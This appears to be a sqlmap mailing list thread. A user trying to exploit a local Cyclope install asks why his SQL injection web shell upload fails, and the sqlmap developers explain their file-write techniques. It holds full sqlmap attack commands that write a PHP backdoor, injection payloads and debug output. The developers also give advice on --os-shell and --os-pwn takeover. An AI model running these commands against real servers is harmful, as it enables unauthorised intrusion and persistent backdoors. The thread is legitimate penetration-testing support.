Hi Brian,

We do use INTO DUMPFILE to write files on the file system when the
database is MySQL. This works if the stacked queries (nested queries) SQLi
technique is supported, which is not the case against a PHP
application with a MySQL back-end. When stacked queries are not possible
and the back-end is MySQL, sqlmap falls back to the UNION SQLi technique
with the same INTO DUMPFILE clause to write the file to the file
system.

When you instruct sqlmap to take over the OS and no stacked queries are
supported, then if the back-end is MySQL again, it will try to upload
a web shell to a writable folder within the web server's document root
directory. This is achieved with the technique explained above or,
better, with LINES TERMINATED BY, used to terminate the original
SQL statement with the file stager injected by sqlmap, which is dumped to
a file on the file system and then used to upload the web shell.

I have checked the Metasploit exploit source code, line 150, and I see
it uses the boolean-based SQL injection technique to upload the file -
that is not yet supported by sqlmap. We will look into implementing
this, I've created a ticket for that,
https://github.com/sqlmapproject/sqlmap/issues/647.

According to the exploit, the request method is POST, so your syntax
should reflect that: -u "http://172.16.71.138:7879/index.php"
--data="act=auth-login&pag=login&username=admin&password=admin" - GET
and POST verbs are not necessarily interchangeable by the application.

Also, I notice you provide your own web shell - you can let sqlmap use
its own with --os-cmd, --os-shell or --os-pwn. When prompted with a
question about the language, stick to PHP; then sqlmap asks what the
writable directory is, so select 2 and provide your application's one,
"C:/Progra~1/Cyclope/ni4zlja/", and let sqlmap do its thing.

All in all, can you please relaunch sqlmap (make sure you run git pull
first to sync to the GitHub repository) with the following syntax:


Bernardo


On 21 March 2014 09:42, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
> Hi.
>
> --file-write requires union or stacked techniques to be available. In case
> of --os-shell we also use INTO OUTFILE technique which is pretty dirty (in
> most of cases you can expect original results appearing in the first couple
> of lines). Option --file-write in our case should produce a "clean" file
>
> Kind regards,
> Miroslav Stampar
>
>
> On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hurrikane.net> wrote:
>>
>> Hello Everyone,
>>
>> I'm attempting to use sqlmap to exploit a local installation of some
>> software.  I know it's vulnerable because it's on exploit-db & metasploit
>> pops it every time (http://www.exploit-db.com/exploits/20501/).  I've had
>> limited success with sqlmap, but I'm at the final stage now where I'm trying
>> to use the sqli's I've found to upload a webshell via sqlmap.  No
>> dice....I'm getting an error stating "[ERROR] none of the SQL injection
>> techniques detected can be used to write files to the underlying file system
>> of the back-end MySQL server."  Other than the obvious, I'm not sure what
>> this means because --os-shell and --os-cmd upload a file and execute just
>> fine.  Does --file-write need something special?  Here's the output:
>>
>> root@kali:/usr/share/sqlmap# sqlmap -u
>> "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin"
>> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
>> /usr/share/webshells/php/simple-backdoor.php --file-dest
>> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>>
>> ...
>> [*] starting at 23:13:08
>>
>> [23:13:08] [DEBUG] cleaning up configuration parameters
>> [23:13:08] [DEBUG] setting the HTTP timeout
>> [23:13:08] [DEBUG] setting the HTTP method to GET
>> [23:13:08] [DEBUG] creating HTTP requests opener object
>> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value
>> [23:13:08] [DEBUG] setting the write file functionality
>> [23:13:08] [INFO] testing connection to the target URL
>> [23:13:08] [DEBUG] declared web page charset 'utf-8'
>> sqlmap identified the following injection points with a total of 0 HTTP(s)
>> requests:
>> ---
>> Place: GET
>> Parameter: username
>>     Type: boolean-based blind
>>     Title: AND boolean-based blind - WHERE or HAVING clause
>>     Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND
>> 'yVaP'='yVaP&password=admin
>>     Vector: AND [INFERENCE]
>>
>>     Type: AND/OR time-based blind
>>     Title: MySQL > 5.0.11 AND time-based blind
>>     Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND
>> 'OHln'='OHln&password=admin
>>     Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>> ---
>> [23:13:08] [INFO] testing MySQL
>> [23:13:08] [INFO] confirming MySQL
>> [23:13:08] [INFO] the back-end DBMS is MySQL
>> web server operating system: Windows
>> web application technology: PHP 5.3.1, Apache 2.2.14
>> back-end DBMS: MySQL >= 5.0.0
>> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system
>> [23:13:08] [INFO] the back-end DBMS operating system is Windows
>> [23:13:08] [ERROR] none of the SQL injection techniques detected can be
>> used to write files to the underlying file system of the back-end MySQL
>> server
>> [23:13:08] [INFO] fetched data logged to text files under
>> '/usr/share/sqlmap/output/172.16.71.138'
>>
>> [*] shutting down at 23:13:08
>>
>>
>> The results are the same when the cmdline is changed up for a POST
>> version:
>>
>> root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php"
>> --data='act=auth-login&pag=login&username=admin&password=admin' -p
>> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
>> /usr/share/webshells/php/simple-backdoor.php --file-dest
>> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>>
>> Any thoughts on what may be happening here would be much appreciated.
>>
>> Thanks,
>>
>> Brian
>>
>>
>> ------------------------------------------------------------------------------
>> Learn Graph Databases - Download FREE O'Reilly Book
>> "Graph Databases" is the definitive new guide to graph databases and their
>> applications. Written by three acclaimed leaders in the field,
>> this first edition is now available. Download your free book today!
>> http://p.sf.net/sfu/13534_NeoTech
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
